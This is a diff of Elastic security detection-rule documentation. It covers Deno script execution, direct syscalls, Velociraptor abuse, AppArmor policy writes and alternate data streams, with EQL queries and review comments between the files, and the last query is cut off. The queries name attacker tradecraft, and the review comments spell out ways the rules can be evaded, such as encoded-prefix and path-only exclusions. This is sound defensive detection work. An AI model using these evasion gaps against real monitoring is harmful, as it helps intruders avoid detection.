+ +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious JavaScript Execution via Deno* + + +Deno is a legitimate JavaScript/TypeScript runtime. This rule fires when a Deno process (identified by name, PE original filename, or code signer "Deno Land Inc.") is started with a command line matching suspicious patterns: javascript with base64, eval(, http, or javascript import. Such patterns are commonly used to run inline or remote scripts and can indicate abuse. 
+ + +*Possible investigation steps* + + +- Review process.command_line and process.args to see the exact script or URL being executed. +- Identify the parent process and how Deno was launched (user, script, terminal, or other tool). +- Check whether Deno is approved on the host; if not, treat as potential unauthorized software execution. +- Correlate with file creation or network events around the same time (downloads, script drops). + + +*False positive analysis* + + +- Legitimate development or automation that runs Deno with eval, http imports, or base64-encoded snippets may trigger; allowlist by host or command-line pattern where appropriate. + + +*Response and remediation* + + +- If abuse is confirmed: contain the host, terminate the Deno process, and remove or block Deno if not authorized; investigate how the script was delivered and scope for similar activity. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "deno.exe" or ?process.pe.original_file_name == "deno.exe" or ?process.code_signature.subject_name == "Deno Land Inc.") and + process.command_line : ("*javascript*base64*", "*eval(*", "*http*", "*javascript*import*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc new file mode 100644 index 0000000000..3cae1cf993 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call.asciidoc 
@@ -0,0 +1,162 @@
+[[prebuilt-rule-8-19-18-suspicious-process-access-via-direct-system-call]]
+=== Suspicious Process Access via Direct System Call
+
+Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* winlogbeat-*
+* logs-windows.sysmon_operational-*
+
+*Severity*: high
+
+*Risk score*: 73
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://twitter.com/SBousseaden/status/1278013896440324096
+* https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Tactic: Execution
+* Resources: Investigation Guide
+* Data Source: Sysmon
+
+*Version*: 315
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Suspicious Process Access via Direct System Call*
+
+
+Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.
+
+More context and technical details can be found in this https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/[research blog].
+
+This rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.
+
+> **Note**:
+> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.
+
+
+*Possible investigation steps*
+
+
+- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
+- Investigate other alerts associated with the user/host during the past 48 hours.
+- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.
+- Examine the host for derived artifacts that indicate suspicious activities:
+ - Analyze the process executable using a private sandboxed analysis system.
+ - Observe and collect information about the following activities in both the sandbox and the alert subject host:
+ - Attempts to contact external domains and addresses.
+ - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.
+ - Examine the DNS cache for suspicious or anomalous entries.
+ - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}}
+ - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.
+ - Examine the host services for suspicious or anomalous entries.
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}}
+ - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}}
+ - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}}
+ - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.
+- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.
+
+
+
+*False positive analysis*
+
+
+- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.
+
+
+*Response and remediation*
+
+
+- Initiate the incident response process based on the outcome of the triage.
+- Isolate the involved host to prevent further post-compromise behavior.
+- If the triage identified malware, search the environment for additional compromised hosts.
+ - Implement temporary network rules, procedures, and segmentation to contain the malware.
+ - Stop suspicious processes.
+ - Immediately block the identified indicators of compromise (IoCs).
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.
+- Remove the malicious certificate from the root certificate store.
+- Remove and block malicious artifacts identified during triage.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+process where host.os.type == "windows" and event.code == "10" and
+ length(winlog.event_data.CallTrace) > 0 and
+
+ /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */
+ not winlog.event_data.CallTrace :
+ ("?:\\WINDOWS\\SYSTEM32\\ntdll.dll*",
+ "?:\\WINDOWS\\SysWOW64\\ntdll.dll*",
+ "?:\\WINDOWS\\System32\\sysfer.dll*",
+ "?:\\Windows\\System32\\wow64cpu.dll*",
+ "?:\\WINDOWS\\System32\\wow64win.dll*",
+ "?:\\Windows\\System32\\win32u.dll*",
+ "?:\\ProgramData\\Symantec\\Symantec Endpoint Protection\\*\\sysfer.dll*") and
+
+ not winlog.event_data.TargetImage :
+ ("?:\\Program Files (x86)\\Malwarebytes Anti-Exploit\\mbae-svc.exe",
+ "?:\\Program Files\\Cisco\\AMP\\*\\sfc.exe",
+ "?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\msedgewebview2.exe",
+ "?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\*\\AcroCEF.exe") and
+
+ not (process.executable : ("?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe",
+ "?:\\Program Files (x86)\\World of Warcraft\\_classic_\\WowClassic.exe") and
+ not winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe")
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Process Injection
+** ID: T1055
+** Reference URL: https://attack.mitre.org/techniques/T1055/
+* Tactic:
+** Name: Execution
+** ID: TA0002
+** Reference URL: https://attack.mitre.org/tactics/TA0002/
+* Technique:
+** Name: Native API
+** ID: T1106
+** Reference URL: https://attack.mitre.org/techniques/T1106/
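Review bot: The *False positive analysis* and *Response and remediation* sections do not describe this rule: the query keys on a Sysmon event 10 `CallTrace` that does not begin in ntdll/win32u/wow64, yet the FP bullet talks about "applications that install root certificates for the purpose of inspecting SSL traffic" and the remediation includes "Remove the malicious certificate from the root certificate store", which reads as carried over from a certificate-installation rule (the 4624 step's "after the registry modification" has the same origin). I would replace the FP bullet with one grounded in the query's own exclusions, e.g. `- Security products, anti-exploit agents and embedded browser/PDF engines that inject into other processes (the query already excludes Symantec sysfer.dll, Malwarebytes mbae-svc.exe, Cisco AMP sfc.exe, msedgewebview2.exe and AcroCEF.exe) can produce CallTraces that do not start in ntdll; add exceptions by source and target image path rather than disabling the rule.`, and drop the certificate-removal step. It is also worth a sentence that every exclusion is a path-only match on `TargetImage`/`process.executable`, so a binary placed at one of those paths inherits the exception; Sysmon event 10 offers no signer field to tighten this, which is a limitation analysts should know when tuning.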
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc
new file mode 100644
index 0000000000..f40fa63dc8
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor.asciidoc
@@ -0,0 +1,129 @@
+[[prebuilt-rule-8-19-18-suspicious-shell-execution-via-velociraptor]]
+=== Suspicious Shell Execution via Velociraptor
+
+Detects shell executions (cmd, PowerShell, rundll32) spawned by Velociraptor. Threat actors have been observed installing Velociraptor to execute shell commands on compromised systems, blending in with legitimate system processes.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* endgame-*
+* logs-crowdstrike.fdr*
+* logs-endpoint.events.process-*
+* logs-m365_defender.event-*
+* logs-sentinel_one_cloud_funnel.*
+* logs-system.security*
+* logs-windows.sysmon_operational-*
+* winlogbeat-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
+* https://attack.mitre.org/techniques/T1219/
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Command and Control
+* Tactic: Execution
+* Tactic: Defense Evasion
+* Resources: Investigation Guide
+* Data Source: Elastic Defend
+* Data Source: Sysmon
+* Data Source: SentinelOne
+* Data Source: Microsoft Defender for Endpoint
+* Data Source: Crowdstrike
+* Data Source: Elastic Endgame
+* Data Source: Windows Security Event Logs
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Suspicious Shell Execution via Velociraptor*
+
+
+Velociraptor is a legitimate endpoint visibility and response tool. Threat actors have been observed deploying it on compromised systems to run shell commands (cmd, PowerShell, rundll32), making their activity look like normal Velociraptor-collector behavior.
+
+
+*Possible investigation steps*
+
+
+- Confirm the parent process name matches a Velociraptor binary (e.g. velociraptor.exe, Velociraptor.exe) and the child is cmd.exe, powershell.exe, or rundll32.exe.
+- Review the child process command line for suspicious or interactive commands (e.g. download, lateral movement, credential access) versus known Velociraptor artifact scripts (Get-LocalGroupMember, Get-Date, registry queries, Velociraptor Tools module).
+- Identify how Velociraptor was installed (dropped by another process, scheduled task, service); correlate with earlier process or file events on the host.
+- Check whether the Velociraptor executable path and code signature are expected (e.g. Program Files vs. temp or user writable); unauthorized installs are often from non-standard paths.
+- Correlate with other alerts for the same host or user (initial access, persistence, C2) to determine if this is abuse vs. legitimate IR/DFIR use.
+
+
+*False positive analysis*
+
+
+- Legitimate Velociraptor artifacts that run Get-LocalGroupMember, Get-Date, registry Run key checks, or Velociraptor Tools PowerShell module are excluded by the rule; remaining FPs may be custom artifacts. Allowlist by command-line pattern or host if you use Velociraptor for authorized IR and see known-good artifacts.
+
+
+*Response and remediation*
+
+
+- If abuse is confirmed: isolate the host, terminate the Velociraptor and child shell processes, and remove the Velociraptor installation (binary, service, config).
+- Determine how Velociraptor was deployed and close the initial access vector; rotate credentials for affected accounts.
+- If the deployment was authorized (IR/DFIR), document and tune the rule or add an exception to reduce noise.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+process where host.os.type == "windows" and event.type == "start" and process.command_line != null and
+ process.parent.name : "velociraptor.exe" and
+ process.name : ("cmd.exe", "powershell.exe", "rundll32.exe") and
+ not (process.name : "powershell.exe" and process.command_line : "*RwBlAHQALQBMAG8AYwBhAGwARwByAG8AdQBwAE0AZQBtAGIAZQBy*") and
+ not (process.name : "powershell.exe" and process.command_line : "*RwBlAHQALQBEAGEAdABl*" and process.command_line : "*-Format*") and
+ not (process.name : "cmd.exe" and process.command_line : "*start*127.0.0.1:8889*") and
+ not (process.name : "powershell.exe" and process.command_line : "*RwBlAHQALQBJAHQAZQBt*" and process.command_line : "*UgBlAGcAaQBzAHQAcgB5*" and process.command_line : "*UgB1AG4A*") and
+ not (process.name : "powershell.exe" and
+ process.args : ("RwBlAHQALQ*", "UgBlAG0AbwB2AGUALQBJAHQAZQBtACA*", "C:\\Program Files\\Velociraptor\\thor.db",
+ "import-module \"C:\\Program Files\\Velociraptor\\Tools\\*"))
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Command and Control
+** ID: TA0011
+** Reference URL: https://attack.mitre.org/tactics/TA0011/
+* Technique:
+** Name: Remote Access Tools
+** ID: T1219
+** Reference URL: https://attack.mitre.org/techniques/T1219/
+* Sub-technique:
+** Name: Remote Desktop Software
+** ID: T1219.002
+** Reference URL: https://attack.mitre.org/techniques/T1219/002/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc
new file mode 100644
index 0000000000..28e4a4038b
--- /dev/null
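Review bot: The last exclusion in the query, `process.args : ("RwBlAHQALQ*", ...)`, is a prefix match on an encoded argument that appears to decode (base64 of UTF-16LE) to `Get-`, so any `-EncodedCommand` payload that merely begins with a Get- cmdlet, e.g. `Get-Date; <anything>`, is excluded in full — unlike the preceding exclusions, which require the cmdlet plus a second token such as `-Format`. I would tighten it to the specific Velociraptor artifacts you intend to allow, or at least state in *False positive analysis* that the encoded-prefix exceptions can be satisfied by prefixing a benign cmdlet. The sub-technique mapping T1219.002 "Remote Desktop Software" does not describe Velociraptor, which is a DFIR/endpoint agent rather than desktop-sharing software; mapping to the parent T1219 only, as the *References* already do, would be more accurate. Since detection hinges on `process.parent.name : "velociraptor.exe"`, a renamed binary is out of scope, and a sentence saying so under *Investigating Suspicious Shell Execution via Velociraptor* would help analysts.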
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files.asciidoc 
@@ -0,0 +1,167 @@
+[[prebuilt-rule-8-19-18-suspicious-write-attempt-to-apparmor-policy-management-files]]
+=== Suspicious Write Attempt to AppArmor Policy Management Files
+
+Detects processes attempting to write to AppArmor policy management pseudo-files located under "/sys/kernel/security/apparmor/". These special kernel interfaces are used to load, replace, or remove AppArmor profiles (".load", ".replace", ".remove"). In normal environments, AppArmor policy management is typically performed by administrative tools such as "apparmor_parser" during system initialization or package installation. Direct interaction with these pseudo-files from shell utilities, interpreters, or scripting environments is uncommon and may indicate attempts to modify security policy at runtime. Adversaries may abuse these interfaces to weaken or disable AppArmor protections, introduce malicious profiles, or exploit vulnerabilities in the AppArmor policy parser as part of local privilege escalation chains.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-endpoint.events.process*
+* endgame-*
+* logs-crowdstrike.fdr*
+* logs-sentinel_one_cloud_funnel.*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt
+* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Linux
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Data Source: Elastic Defend
+* Data Source: Elastic Endgame
+* Data Source: Crowdstrike
+* Data Source: SentinelOne
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> 
**Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Suspicious Write Attempt to AppArmor Policy Management Files*
+
+
+This rule flags shells, scripting runtimes, and basic file utilities trying to write directly to AppArmor’s policy control files, an unusual action that can change or remove enforcement while the system is running. An attacker with local code execution may echo a crafted profile into `.replace` or write to `.remove` from a shell script to weaken confinement before dumping credentials or launching a privilege-escalation chain.
+
+
+*Possible investigation steps*
+
+
+- Determine whether the activity aligns with authorized package installation, configuration management, or AppArmor maintenance by correlating the timestamp with change tickets, software updates, and administrator sessions.
+- Reconstruct the full parent-child execution chain and user context to identify how the write was initiated, whether it came from an interactive shell, script, container entrypoint, or remotely spawned session, and whether elevated privileges were obtained just beforehand.
+- Capture the exact payload or referenced file used in the write attempt and compare it to approved AppArmor profiles to determine whether the action was loading a new profile, weakening an existing one, or removing confinement entirely.
+- Verify the system’s current AppArmor state immediately after the event, including enforcement mode, recently modified or unloaded profiles, and any audit or kernel messages indicating parser errors, profile replacement, or successful policy removal.
+- Investigate adjacent activity from the same user, session, and host for signs of defense evasion or privilege escalation, such as sudo abuse, exploitation traces, disabling other security controls, credential access, or rapid execution of binaries that would normally be confined.
+
+
+*False positive analysis*
+
+
+- A legitimate system initialization or package maintenance script may use `echo`, `tee`, `cat`, or a shell redirection to load or replace an approved AppArmor profile, so verify the parent process and event timing align with boot activity or an authorized update and that the profile content matches a known file under `/etc/apparmor.d/`.
+- An administrator or deployment script may temporarily reload or remove a profile during sanctioned application troubleshooting, so confirm the executing user or service account, the script location and change record, and that the expected AppArmor profile was restored or reloaded immediately afterward.
+
+
+*Response and remediation*
+
+
+- Isolate the affected Linux host from the network and suspend interactive access while preserving the shell history, the script or payload used to write to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and any related dropped files for forensic review.
+- Re-enable AppArmor enforcement from trusted administration tooling, compare currently loaded profiles with the approved baseline under `/etc/apparmor.d/`, and remove any unauthorized profile loads, replacements, or profile removals introduced by the attacker.
+- Hunt for and delete persistence established around the same activity, including new or modified `systemd` services, cron jobs, startup scripts, SSH `authorized_keys` entries, `sudoers` changes, and binaries or scripts placed in writable directories.
+- Escalate immediately to incident response if AppArmor protections were successfully weakened or removed, a privileged service profile was altered, root access is suspected, or similar write attempts appear on additional Linux systems.
+- Restore the host to a known-good state from a trusted image or approved configuration backup when system integrity is uncertain, then rotate credentials used on the host and harden access so only authorized administrators and deployment tooling can modify AppArmor policies.
+
+
+==== Setup
+
+
+
+*Setup*
+
+
+This rule requires data coming in from Elastic Defend.
+
+
+*Elastic Defend Integration Setup*
+
+Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.
+
+
+*Prerequisite Requirements:*
+
+- Fleet is required for Elastic Defend.
+- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation].
+
+
+*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:*
+
+- Go to the Kibana home page and click "Add integrations".
+- In the query bar, search for "Elastic Defend" and select the integration to see more details about it.
+- Click "Add Elastic Defend".
+- Configure the integration name and optionally add a description.
+- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads".
+- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide].
+- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions"
+- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead.
+For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide].
+- Click "Save and Continue".
+- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts.
+For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide].
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+process where host.os.type == "linux" and event.type == "start" and
+event.action in ("exec", "exec_event", "start", "ProcessRollup2") and
+(
+ process.name in (
+ "cat", "echo", "tee", "dd", "truncate", "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish",
+ "busybox", "awk", "sed", "xargs", "find", "grep", "node", "timeout", "env"
+ ) or
+ process.name like (".*", "python*", "perl*", "ruby*", "lua*", "php*")
+) and
+process.command_line like (
+ "*/sys/kernel/security/apparmor/.load*",
+ "*/sys/kernel/security/apparmor/.replace*",
+ "*/sys/kernel/security/apparmor/.remove*"
+)
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Impair Defenses
+** ID: T1562
+** Reference URL: https://attack.mitre.org/techniques/T1562/
+* Sub-technique:
+** Name: Disable or Modify Tools
+** ID: T1562.001
+** Reference URL: https://attack.mitre.org/techniques/T1562/001/
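Review bot: The query fires only when the securityfs path appears in `process.command_line` of a newly started process, so the example the guide itself gives — echoing a profile into `.replace` from a shell script — is caught only when the redirection is part of an inline `sh -c`/`bash -c` string: inside a script file the redirection is handled by the shell and never appears in any exec event (the builtin `echo` receives no path argument), and only tools like `tee`/`dd` carry the path in argv. The guide should say so, e.g. as a note under *False positive analysis*: `- This rule sees the target path only when it is passed as a process argument or inside an inline shell command; writes performed by redirection within a script, by a compiled program, or via an inherited file descriptor require file-open or auditd telemetry on /sys/kernel/security/apparmor/ to detect.` Also, `process.name like (".*", ...)` puts every process whose name begins with a dot in scope — presumably to catch hidden or renamed interpreters — and that intent is worth a word so tuners do not remove it as an accident.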
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc
new file mode 100644
index 0000000000..d3e96716c2
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream.asciidoc
@@ -0,0 +1,150 @@
+[[prebuilt-rule-8-19-18-unusual-file-creation-alternate-data-stream]]
+=== Unusual File Creation - Alternate Data Stream
+
+Identifies suspicious creation of Alternate Data Streams on highly targeted files using a script or command interpreter. This is uncommon for legitimate files and sometimes done by adversaries to hide malware.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* winlogbeat-*
+* logs-endpoint.events.file-*
+* logs-windows.sysmon_operational-*
+* logs-m365_defender.event-*
+* logs-sentinel_one_cloud_funnel.*
+* endgame-*
+
+*Severity*: high
+
+*Risk score*: 73
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*: None
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Resources: Investigation Guide
+* Data Source: Elastic Defend
+* Data Source: Sysmon
+* Data Source: Microsoft Defender for Endpoint
+* Data Source: SentinelOne
+* Data Source: Elastic Endgame
+
+*Version*: 322
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Unusual File Creation - Alternate Data Stream*
+
+
+Alternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.
+
+The regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.
+
+Attackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.
+
+> **Note**:
+> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.
+
+
+*Possible investigation steps*
+
+
+- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:
+ - `Get-Content C:\Path\To\file.exe -stream SampleAlternateDataStreamName`
+- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
+- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.
+- Investigate other alerts associated with the user/host during the past 48 hours.
+- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.
+- Examine the host for derived artifacts that indicate suspicious activities:
+ - Analyze the process executable using a private sandboxed analysis system.
+ - Observe and collect information about the following activities in both the sandbox and the alert subject host:
+ - Attempts to contact external domains and addresses.
+ - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.
+ - Examine the DNS cache for suspicious or anomalous entries.
+ - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}}
+ - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.
+ - Examine the host services for suspicious or anomalous entries.
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}}
+ - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}}
+ - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}}
+ - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.
+- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.
+
+
+
+*False positive analysis*
+
+
+- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of process executable and file conditions.
+
+
+*Response and remediation*
+
+
+- Initiate the incident response process based on the outcome of the triage.
+- Isolate the involved host to prevent further post-compromise behavior.
+- If the triage identified malware, search the environment for additional compromised hosts.
+ - Implement temporary network rules, procedures, and segmentation to contain the malware.
+ - Stop suspicious processes.
+ - Immediately block the identified indicators of compromise (IoCs).
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.
+- Remove and block malicious artifacts identified during triage.
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+file where host.os.type == "windows" and event.type == "creation" and
+ process.name : ("cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "node.exe", "python*.exe") and
